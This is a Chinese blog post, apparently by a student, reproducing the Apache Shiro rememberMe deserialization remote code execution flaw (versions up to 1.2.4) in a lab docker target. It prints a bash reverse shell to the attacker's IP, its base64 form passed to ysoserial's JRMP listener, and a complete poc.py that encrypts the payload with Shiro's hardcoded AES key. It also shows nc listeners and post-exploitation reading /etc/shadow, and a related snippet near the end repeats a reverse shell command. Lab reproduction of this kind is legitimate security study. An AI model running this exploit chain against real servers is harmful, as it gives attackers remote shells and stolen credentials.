Shiro反序列化漏洞【详细解析】

最新推荐文章于 2024-06-29 10:31:12 发布
最新推荐文章于 2024-06-29 10:31:12 发布
阅读量1.4w 收藏 75
点赞数 30
文章标签: docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47536169/article/details/120021370
版权

Shiro是什么东西

  • Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理                                    
  • shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

原理解释https://www.freebuf.com/vuls/178014.html

什么是硬编码:
硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。

漏洞位置

http 请求包 cookie 中的 rememberMe 参数。
该漏洞对shiro<=1.2.4的版本有影响。

攻击流程图

环境搭建 

靶机:192.168.43.132
攻击机:192.168.43.131

  • 获取docker镜像                                                                                                                            
    docker pull medicean/vulapps:s_shiro_1

  • 重启docker                                                                                                                                  

    systemctl restart docker
  • 启动docker镜像:                                                                                                                         
    docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

  • 访问:                                                                                                                                         http://192.168.43.132:8081  /  环境搭建成功 

 下载工具

ysoserial的jar文件

依次执行以下命令(jar的文件名要和脚本中的一样,文件要和脚本在同一目录下)

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial

mvn package -DskipTests

出现了特殊问题

如果出现一下情况的话,是没有安装maven的。【解决mvn command not found:下一个就好了】

 

 解决:mvn command not found

linux安装maven

转载:https://www.cnblogs.com/yuexiaoyun/articles/13033946.html

1、安装 wget 命令:

 yum -y install wget

【如果提示yum command not found的话,别理他,这是安装wget命令,一般我们的都已经安装好了】

2、下载maven安装包

wget http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz

3.解压maven安装包

tar -zxvf apache-maven-3.5.4-bin.tar.gz

4.配置maven:

 vim /etc/profile

在配置文件配置中加上:

export MAVEN_HOME=/root/apache-maven-3.5.4 (这个目录换成你的 maven 解压后的文件所在目录)

export PATH=$MAVEN_HOME/bin:$PATH

 

让文件生效,刷新配置文件 :

source /etc/profile

5.查看maven 版本:

mvn -version

# 或者

mvn -v

现在的话mvn已经可以在/etc/profile这个文件里面操作。

关键要在source /etc/profile里面进入ysoserial这个目录

cd ysoserial
mvn package -DskipTests

 这样就可以了

现在就解决了mvn command not found的情况。

制作反弹shell 代码

  • 使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码

 转载:http://www.jackson-t.ca/runtime-exec-payloads.html

攻击机:192.168.43.131

bash -i >& /dev/tcp/192.168.43.131/999 0>&1

999端口是监听反弹端口(nc -lvnp 999)

使用ysoserial中JRMP监听模块,监听1001端口

  • 攻击机:192.168.43.131 中执行命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjEzMS85OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'

【 ' ' 里面的是刚刚bash编码】

一定要进入ysoserial的target里面,因为要用到target里面的ysoserial-0.0.6-SNAPSHOT-all.jar 

使用poc.py 生成Payload

  • 在攻击机:192.168.43.131 中生成rememberMe  

    python poc.py 192.168.43.131:1001

【把poc.py也放在/ysoserial/target里面执行】 

poc.py代码

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
 
def encode_rememberme(command):

    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
 
 
if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())

出现了特殊问题

如果出现下面的这种情况,【Crypto.Cipher import AES ImportError】

用easy_install安装pycrypto:

easy_install pycrypto-2.6.tar.gz

转载:https://blog.csdn.net/feier7501/article/details/9265551

 

这里提示easy_install:command not found 【那就下一个】

用wget下载:

wget https://bootstrap.pypa.io/ez_setup.py -O - | python

转载:https://blog.csdn.net/chenji9967/article/details/100623972

然后就可以用easy_install

又出现了新的问题 。【找不到这个pycrypto-2.6.tar.gz,那就换一个再试】

 

还是用easy_install 下载:

easy_install pycrypto

转载:https://blog.csdn.net/weixin_34327223/article/details/92066493

 这里就报错了

error: Setup script exited with error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

上网搜了一下资料也是找到了解决的办法。

安装好python环境之后顺便安装对应版本的dev:

sudo apt-get install python-dev python3-dev

 

继续用easy_install 下载:

easy_install pycrypto

用poc.py生成rememberMe

 终于成功啦。【哭死了,好辛苦啊】

 

监听反弹端口 999

  • 攻击机:192.168.43.131 中执行命令:

nc -lvnp 999

 

开启kali里面的burpsuit。

用浏览器打开,填写提供的Usename Password , 记住一定要勾选Remember Me。

 

 抓登录界面的包。

 

用刚刚构造的rememberMe,放到jsessionid后面

这个时候nc的反弹shell就过来了

 

思考了一下,得到这个tmp下的root权限又能干什么,自己就玩了一下。

1.目录的一个遍历

 

 2.cat /etc/shadow

3.发现这个只是读写的root权限,应该有本地提权的一些办法得到更高的权限,有了读写的权限,后门木马都可以随便放。

 

小结:虽然这次漏洞的复现并不是很难理解,但是网上有很多的东西都没有说明白,讲清楚或者没有遇到的问题,当自己操作起来就会发现很多bug,一个一个找,对于新手来说比较的困难,所以我就做了一个比较详细的漏洞复现。

           因为自己是一个比较容易放弃的人,很高兴在面对很多困难的时候没有第一时间的放弃,最后成功的复现。

           作为一个东软的大三的学生,今年对咱们大三的学生不太友好,现在是凌晨00:45我还在这里唠叨,接下来就是准备复习面试的知识,找实习工作出来打工,祝愿自己找到一份满意的工作,身体健康,早点脱单【这个有点难度哈】。

           希望看过此贴的人都能够——

                                                             在试炼的终点是花开万里,愿你起程渺小,结尾壮大。

爱码⑩
关注
  • 30
    点赞
  • 75
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
文件内包含内容如下: 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法
shiro反序列化测试工具.zip
06-04
在这个名为"shiro反序列化测试工具.zip"的压缩包中,包含的是用于检测Shiro框架是否存在反序列化漏洞的测试工具。这些工具可以帮助开发者或安全研究员识别并修复潜在的安全隐患,确保应用的安全性。 以下是关于...
shiro反序列化分析
2301_79724395的博客
06-11 854
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
shiro反序列化漏洞总结
最新发布
2302_80462925的博客
06-29 1560
shiro反序列化漏洞总结
Shiro反序列化漏洞
qq_40882763的博客
02-21 2878
Shiro反序列化漏洞 目录 Shiro反序列化漏洞 1.1 漏洞介绍 1.1.1 漏洞简介 1.1.2 影响版本 1.1.3 漏洞原理 1.1.4 漏洞特征 1.1.5 漏洞影响   1.2 环境配置 1.3 漏洞检测 ​​1.4 漏洞利用 1.5 防御措施 参考: 一、Shrio反序列化导致命令执行(Shiro-550 CVE-2016-4437) 1.1 漏洞介绍 1.1.1 漏洞简介   Apache Shiro是一款开源企业常见JAVA安全框架,提供...
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6435
shiro反序列化漏洞
shiro反序列化漏洞
wutiangui的博客
09-07 2046
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,保证对象的完整性和可传递性;反序列化即逆过程,由字节流还原成对象。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。漏洞影响版本。
shiro反序列化一键测试工具
12-12
对于Shiro反序列化一键测试工具,这份文档应该详细说明了如何运行jar文件,如何配置参数以指向目标系统,以及如何解释测试结果。阅读这份文档对于正确使用工具至关重要。 `data`目录可能包含了工具运行时需要的一些...
linux下java反序列化通杀回显方法的低配版实现 - 先知社区1
08-03
然而,利用Shiro反序列化漏洞的挑战在于找到有效的gadget和实现带内回显,特别是当回显不在HTTP响应包中,而是在响应包之前时。 作者在浏览Twitter时发现了一种解决带内回显问题的方法,这种方法基于一篇名为《通杀...
061-Apache Shiro 反序列化之殇.pdf
09-20
在特定版本(如1.2.4及更早版本)中,Shiro的一个反序列化漏洞成为了黑客攻击的目标。 这个漏洞主要涉及到Shiro的Remember Me功能。Remember Me允许用户在关闭浏览器后仍然保持登录状态,以便下次访问时自动登录。...
Java代码执行漏洞中类动态加载的应用1
08-03
类动态加载的一个实际应用案例是Apache Shiro框架的反序列化漏洞利用。在内网渗透场景下,由于无法直接写jsp页面或者进行网络通信,动态加载字节码可以绕过这些限制。例如,可以将reGeorg代理的代码嵌入到动态注册的...
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
漏洞复现】Shiro 反序列化漏洞
2301_80115097的博客
11-08 2171
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
漏洞复现——shiro反序列化
小林说安全的博客
05-22 5317
漏洞复现——shiro反序列化
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行渗透。\[1\] 在服务端接收cookie值时,攻击者可以利用这个漏洞进行攻击。攻击者可以按照以下步骤来解析处理cookie值:首先检索RememberMe cookie的值,然后进行Base64解码,接着使用AES解密(加密密钥硬编码),最后进行反序列化操作。由于在调用反序列化时未进行任何过滤处理,攻击者可以触发远程代码执行漏洞。\[2\] 攻击者可以利用这个漏洞执行反弹shell语句,从而获取对目标系统的控制权。例如,可以使用以下命令来执行反弹shell语句:python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"。\[3\] #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值